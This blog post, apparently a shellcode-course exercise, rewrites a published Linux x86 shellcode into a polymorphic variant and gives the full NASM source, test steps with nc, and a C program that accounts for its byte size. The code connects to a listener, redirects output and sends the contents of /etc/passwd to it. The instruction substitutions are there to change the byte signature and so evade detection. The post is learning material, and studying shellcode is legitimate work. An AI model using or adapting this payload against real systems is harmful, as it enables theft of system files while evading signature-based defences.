6_3 - READING "/ETC/PASSWD"
1 - INTRODUCTION
- The same concepts studied in 6_1 apply in this case.
2 - MODIFYING A SHELLCODE
- The original shellcode to be modified in this exercise reads the "/etc/passwd" file and sends its content to 127.1.1.1 port 12345:
http://shell-storm.org/shellcode/files/shellcode-861.php
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw-PG8hglclEP12w9t3igjVFtpxoIMrCKdjTzeVw3z63wTHZHvbhH-ke1j9JscwE_EyZ5bjrZP4opX37BoTXRGTTah0vSuj30Zrmyn_s90Ss8-H2nw8Y36zMpk4W2uKLGlPKpAhjfGmTPc/s1600/screenshot.1.jpg)
- Let's look at four possible modifications; each one keeps the semantics of the original instruction but changes the byte pattern:
a) Instead of using "inc", adding 1 (the 1-byte "inc ebx" becomes the 3-byte "add ebx,0x1"):
; inc ebx
add ebx,0x1
b) When moving between two registers, going through a third intermediate register. The extra step is redundant, and it is harmless here only because edx is not read again before it is zeroed for the read() call, but it distorts the code:
; mov esi, eax
mov edx, eax
mov esi, edx
c) Using "mov" instead of "push/pop". Caveat: "mov eax, 0x4" assembles to B8 04 00 00 00, so this substitution introduces null bytes into the shellcode; "xor eax, eax" followed by "mov al, 0x4" would have the same effect and stay null-free:
; push 0x4
; pop eax
mov eax, 0x4
d) Using "mov" instead of "push". The three fields of the sockaddr_in struct are written below esp at the offsets the pushes would have left them, and esp is then lowered by 8, so the struct ends up at [esp] exactly as before (family at esp, port at esp+2, address at esp+4). Writing below esp before adjusting it is safe here only because nothing else touches the stack in between; the i386 ABI has no red zone, so a signal delivered at that instant would overwrite those bytes:
;push DWORD 0x0101017f ;127.1.1.1
;push WORD 0x3930 ; Port 12345
;push WORD bx
mov dword [esp-4], 0x0101017f ; <- mov instead of push
mov word [esp-6], 0x3930
mov word [esp-8], bx
sub esp,8
- The assembly program that results from applying these modifications is A6_3.nasm:
section .text
global _start
_start:
; socket(AF_INET, SOCK_STREAM, 0) through socketcall: eax = 0x66, ebx = 1 (SYS_SOCKET)
push BYTE 0x66
pop eax
xor ebx, ebx
; inc ebx
add ebx,0x1 ; <- adding 1 to ebx
xor edx, edx
push edx ; protocol = 0
push BYTE 0x1 ; SOCK_STREAM
push BYTE 0x2 ; AF_INET
mov ecx, esp ; ecx -> argument array
int 0x80
; mov esi, eax
mov edx, eax ; <- going through edx; esi = socket fd
mov esi, edx
; connect(fd, &sockaddr_in, 16) through socketcall: ebx = 3 (SYS_CONNECT)
push BYTE 0x66
pop eax
; inc ebx
add ebx,0x1 ; <- adding 1 to ebx (ebx = 2, reused below as AF_INET)
;push DWORD 0x0101017f ;127.1.1.1
;push WORD 0x3930 ; Port 12345
;push WORD bx
mov dword [esp-4], 0x0101017f ; <- mov instead of push
mov word [esp-6], 0x3930
mov word [esp-8], bx
sub esp,8 ; sockaddr_in is now at [esp]
mov ecx, esp
push BYTE 16 ; addrlen
push ecx ; &sockaddr_in
push esi ; fd
mov ecx, esp
; inc ebx
add ebx, 0x1 ; <- adding 1 to ebx (ebx = 3 = SYS_CONNECT)
int 0x80
; dup2(3, 1): ebx still holds 3, which is the socket fd as long as the process
; only has fds 0-2 open, so stdout now points at the socket
mov esi, eax ; eax is 0 after a successful connect; esi is not used again
push BYTE 0x1
pop ecx
mov BYTE al, 0x3F
int 0x80
;read the file
jmp short call_shellcode
shellcode:
; open("/etc/passwd", O_RDONLY); the path address is popped from the call below
push 0x5
pop eax
pop ebx
xor ecx,ecx
int 0x80
; read(fd, esp, 0xffff): the file content is read onto the stack
mov ebx,eax
mov al,0x3
mov edi,esp
mov ecx,edi
xor edx,edx
mov dh,0xff
mov dl,0xff
int 0x80
; write(1, esp, bytes_read); fd 1 is the socket after dup2
mov edx,eax
; push 0x4
; pop eax
mov eax, 0x4 ; <- mov instead of push/pop (encodes as B8 04 00 00 00: null bytes)
mov bl, 0x1
int 0x80
; exit()
; push 0x1
; pop eax
mov eax, 0x1 ; <- mov instead of push/pop (encodes as B8 01 00 00 00: null bytes)
inc ebx
int 0x80
call_shellcode:
call shellcode
message db "/etc/passwd" ; not NUL-terminated: relies on the byte after the shellcode being zero, as the C string literal in ShellcodeTest.c guarantees
3 - TESTING POLYMORPHISM
- Assembling and linking A6_3.nasm:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-SVCN44JXDjNC4q5AGknsw78wXeWQ5Ure8pSED17hxg01Alt8A3r-0SMvmR8a6hFIAskqTp8clsdt5-zA2GiTbXxEd7bo-PzfZ6UqTseLQ2kOVMlms6qI98NXFo7h4Utl0co_LyExrNSm/s1600/screenshot.2.jpg)
- Extracting the shellcode:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcTwmCf5a3j1SvYuR_IBzkCBxYGIRV-UG6NqKgGJgSIi2pMPnVhAmgsU_DqiCFQ0P5x-I5gESG6Y5qG34udoRw27VPNbaqSYbB6FHt-M1S0zsqhkTAMIKjYiBXsP3ZddBwOPQe7jG855kC/s1600/screenshot.3.jpg)
- Inserting the extracted shellcode into the ShellcodeTest.c program:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXK0-zAIywpne0JUZ118LMLvRvjH-A-eU_nF0Hum58MRJu2uabfVTpnmc8KT2QXSwO58oJjPMKmvZhW5BBmm5PI0BoSkDU8SvcAAEssaUBAaGNCs0ByD2iSYCVNpgf07gNxoYidOjrfQ7m/s1600/screenshot.5.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ6-cgUi3QX1tDbh-TNpj3QRW5xu3uNg5rCpmZigOFAAsE690IRtMviwWLuMAPF9udtvrYEnTBhzbdllB_d9mNsGWx7JZuS9ZGJycdiIPt-nhHnaDzCsEvti3fFUytYXOBR-vicpjL6r7M/s1600/screenshot.4.jpg)
- Compiling ShellcodeTest.c:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC2zmQdwPUIqGjyQq1WMRDUHDVgSaAA4LBs2Q7mVlf1DAVi2Y4e8GQT40U6LOlddqeV4H73XNfb9fmdIbUyun9d6-pE8mlNhQcBJPL3l_UIBosbKxnpnxOvSh0hJa82UZLDMbkGmZ1g6kg/s1600/screenshot.6.jpg)
- To test the program, nc is started from a second console to listen on 127.1.1.1:12345:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhthhbF7ZgABH3YhZs8GO9clXpH0O7E-RZkeQ0DIdgNpOqQ55SRQalJB4mvzQ6IQMxRWd_K4hURLK1rFfzdXkAR1RUthuP6qnhJGAwN_usRMehwytM0gv6FrvJH1DJ2M2eJJ8b2BDAdESC/s1600/screenshot.7.jpg)
- Running the compiled ShellcodeTest gives the same result as the original program: the content of "/etc/passwd" is received at address 127.1.1.1 port 12345:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq7QDL3dwqwkAEBMD7G91GxMa9whh1OfWFCirIQMrPWz78mDD-9FSFUJ4oPcyyygKeMOf1RNTGflB9a0jwqCLG0HOHiw0iI6Stf4b3GYXAIxbBy4sMkn5iASaldYzmaQ0Oau6EUYt2uiwl/s1600/screenshot.11.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3UtzKUSHzNo2TJZrLt_YAksPV_76elkqiUyMvuj4-7jA3VCvLBDtStxxuKaq81j9TFGPIV_f6hBCq3cRIVZRALuvkw4yva43GmsoKQKJCAGbeKMY7nAgn2pEgzwVcGugR8SW8EsY7qobV/s1600/screenshot.10.jpg)
- The original shellcode has 111 bytes. The 104 bytes reported for the new one cannot be its real size, because every one of the four substitutions is longer than what it replaces: "inc ebx" is 1 byte and "add ebx,0x1" is 3; "mov esi,eax" is 2 bytes and the detour through edx is 4; "push 0x4 / pop eax" is 3 bytes and "mov eax,0x4" is 5; the three pushes of the sockaddr_in are 11 bytes and the four instructions that replace them are 23. Applied as often as A6_3.nasm applies them (three times, once, twice, once) that is 24 extra bytes, so the modified shellcode is 135 bytes long, not shorter than the original. A lower figure is what a strlen()-based count, which is what the usual ShellcodeTest.c harness prints, reports: "mov eax, 0x4" and "mov eax, 0x1" assemble to B8 04 00 00 00 and B8 01 00 00 00, and strlen() stops at the first null byte. The shellcode still runs from the C array because every byte is present, but those nulls would truncate it in any string-based injection. Checking the extracted bytes for \x00, and replacing those two instructions with "xor eax, eax" followed by "mov al, ...", is the missing step before the result counts as a usable polymorphic variant.
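The following is an added example, not code from the original post or from shell-storm. It does the byte accounting behind the four substitutions of section 2 and the size comparison of section 3: each array is the 32-bit x86 encoding that NASM emits for the instruction sequence named in its comment (hand-assembled here; confirm against `objdump -d A6_3`), and the program reports the size change of every substitution, how often A6_3.nasm applies it, whether the replacement introduces a null byte, and how far a strlen()-style count gets before it stops.

```c
#include <stdio.h>
#include <stddef.h>

/* Added example, not code from the original post: byte accounting for the four
 * substitutions applied in A6_3.nasm. Each array holds the x86-32 encoding NASM
 * emits for the instruction sequence in the comment (hand-assembled; confirm
 * with "objdump -d A6_3"). */

/* a) inc ebx  ->  add ebx,0x1 */
static const unsigned char a_before[] = { 0x43 };
static const unsigned char a_after[]  = { 0x83, 0xC3, 0x01 };
/* b) mov esi,eax  ->  mov edx,eax ; mov esi,edx */
static const unsigned char b_before[] = { 0x89, 0xC6 };
static const unsigned char b_after[]  = { 0x89, 0xC2, 0x89, 0xD6 };
/* c) push 0x4 ; pop eax  ->  mov eax,0x4 (imm32 carries three null bytes) */
static const unsigned char c_before[] = { 0x6A, 0x04, 0x58 };
static const unsigned char c_after[]  = { 0xB8, 0x04, 0x00, 0x00, 0x00 };
/* d) push DWORD 0x0101017f ; push WORD 0x3930 ; push WORD bx
 *    ->  mov dword [esp-4],0x0101017f ; mov word [esp-6],0x3930 ;
 *        mov word [esp-8],bx ; sub esp,8 */
static const unsigned char d_before[] = { 0x68, 0x7F, 0x01, 0x01, 0x01,
                                          0x66, 0x68, 0x30, 0x39,
                                          0x66, 0x53 };
static const unsigned char d_after[]  = { 0xC7, 0x44, 0x24, 0xFC, 0x7F, 0x01, 0x01, 0x01,
                                          0x66, 0xC7, 0x44, 0x24, 0xFA, 0x30, 0x39,
                                          0x66, 0x89, 0x5C, 0x24, 0xF8,
                                          0x83, 0xEC, 0x08 };

struct subst {
    const char *name;
    const unsigned char *before; size_t before_len;
    const unsigned char *after;  size_t after_len;
    int uses;                    /* how many times A6_3.nasm applies it */
};

static const struct subst substs[] = {
    { "a) inc -> add",            a_before, sizeof a_before, a_after, sizeof a_after, 3 },
    { "b) mov via edx",           b_before, sizeof b_before, b_after, sizeof b_after, 1 },
    { "c) push/pop -> mov imm32", c_before, sizeof c_before, c_after, sizeof c_after, 2 },
    { "d) push -> mov [esp-n]",   d_before, sizeof d_before, d_after, sizeof d_after, 1 },
};
#define NSUBST (sizeof substs / sizeof substs[0])

/* Offset of the first 0x00 byte in a sequence, or -1 if it is null-free. */
long first_null(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0x00) return (long)i;
    return -1;
}

/* Number of bytes a strlen()-style count sees: it stops at the first null. */
size_t strlen_count(const unsigned char *p, size_t n)
{
    long z = first_null(p, n);
    return z < 0 ? n : (size_t)z;
}

/* Size change in bytes of substitution i (positive means the shellcode grows). */
long subst_delta(size_t i)
{
    return (long)substs[i].after_len - (long)substs[i].before_len;
}

/* Total growth once every substitution is applied as often as A6_3.nasm does. */
long total_growth(void)
{
    long sum = 0;
    for (size_t i = 0; i < NSUBST; i++)
        sum += subst_delta(i) * substs[i].uses;
    return sum;
}

int main(void)
{
    const long original = 111;   /* size of the unmodified shellcode, from the post */
    for (size_t i = 0; i < NSUBST; i++) {
        long z = first_null(substs[i].after, substs[i].after_len);
        printf("%-26s %2zu -> %2zu bytes (%+ld) x%d, null byte: %s\n",
               substs[i].name, substs[i].before_len, substs[i].after_len,
               subst_delta(i), substs[i].uses, z < 0 ? "no" : "YES");
    }
    printf("real size: %ld -> %ld bytes\n", original, original + total_growth());
    return 0;
}
```

Only substitution c) trips the null-byte check; the other three are null-free but each costs bytes, so the total growth of 24 bytes is the figure to compare against the original 111, while the strlen()-style count is the one that stops inside "mov eax, 0x4".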